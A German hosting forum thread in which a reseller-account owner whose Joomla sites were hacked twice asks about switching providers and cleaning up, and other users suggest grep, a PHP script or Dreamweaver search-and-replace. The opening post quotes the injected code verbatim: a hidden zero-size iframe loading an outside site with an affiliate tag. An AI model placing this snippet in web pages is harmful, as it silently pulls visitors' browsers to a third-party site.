Zum 2. mal complett mein reselleraccount gehackt worden

Lexomat

New Member
:mad:Ich hab nen reselleraccount auf guenstig-webspace.de
gemietet und bin 2 mal complett gehackt worden,
jetzt such ich mir infos im netz weil der support den ich da bekomm für meine verhältnisse zu dürftig ist

habe unter anderem mehrere Joomla seiten am laufen und wollte mir die server geschichten sparen indem ich einen reseller miete.

wollte nach dem vorletzten crash schon mal den sever wechseln

mein provider jedoch, meinte das ich den account nicht einfach überspielen kann wenn es unterschiedliche confixx versionen sind

stimmt das so?

würde gerne den gesamten reseller auf neuen provider wechseln wenn das geht--- ansonsten auch einzeln jeden account

wie gehe ich da vor?

letzte hack war von einem bekannten joomla seiten hacker
es wird dabei an bestimmte seiten die auf .php bzw. .html enden ein code angehängt
hier der code des iframs

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

ich benutze smartftp

dazu folgend frage

gibt es ein tool , was alle verzeichnisse und unterverzeicnisse im root verzeichnis z. B. nach .php und .html dateien durchsucht, diese öffnet
diesen exakten code findet und löscht und die korrigierten datein dann wieder abspeichert
das wäre doch voll cool
oder wenigstens alle dateien die den code enthalten auflistet

hab eauch schon mit backups versucht , jedoch nach weiderherrstellungs abschickung keine veränderung vor gefunden --- sehr deprimierent

hab schon im netz nach der bedeutung von "Dumps aus ~/backup holen"
vergeblich gesucht auch in manuals von confixx jedoch nichts gefunden
wann muss diese funktion angeharkt sein wann nicht, was macht den uinterschied aus? dumpich dumpich

deswegen jetzt hier das so, bin halt nur halbprofy und autodidaktiker lol

als support bekam ich nur eine jämmerlich auskunft nach einer woche:

"also register_globals wird bei uns auf keine Fall eingesetzt. Wir sind uns des
Risikos bewußt und nicht bereit dieses einzugehen."

aber was genau soll das nun wieder bedeuten
also wenn mir da jemand nen insider tipp geben könnte
wäre es echt nett

hoffe auf baldige antwort
 
mein provider jedoch, meinte das ich den account nicht einfach überspielen kann wenn es unterschiedliche confixx versionen sind
Ja, wenn er die neueste Version hat, dann braucht Dein neuer Provider auch die Neueste. Sonst kann es Probleme geben.

würde gerne den gesamten reseller auf neuen provider wechseln
Aber hier mal was ganz Grundsätzliches:
Wenn Dein Joomla gehakt wurde, dann bringst Du mit einem Umzug keine Besserung. Ganz im Gegenteil: Alles bleibt wie es ist, weil DU die Lücke im Joomla nicht schließt.

gibt es ein tool ...
Auf der Commandozeile: grep.
Da Du aber wahrscheinlich keinen ssh-Zugang hast, kann man sich aber ganz schnell so ein Programm mit PHP basteln.

huschi.
 
Dreamweaver kann das, ich weiß aber nicht ob das in Verbindung mit dem FTP Plugin funktioniert, müßtest halt die Daten im Notfall lokal bearbeiten.

(Kann suchen und ersetzen über Ordner ausführen)

mfg

Andreas
 
Kannst Du Die auch als perl oder php Coden.

Das Angebot selbst nun ja, was hast Du da 1000 Reseller?

Dürfte ich mal eine Seite von Dir sehen?


mfg
the_condor
 
Back
Top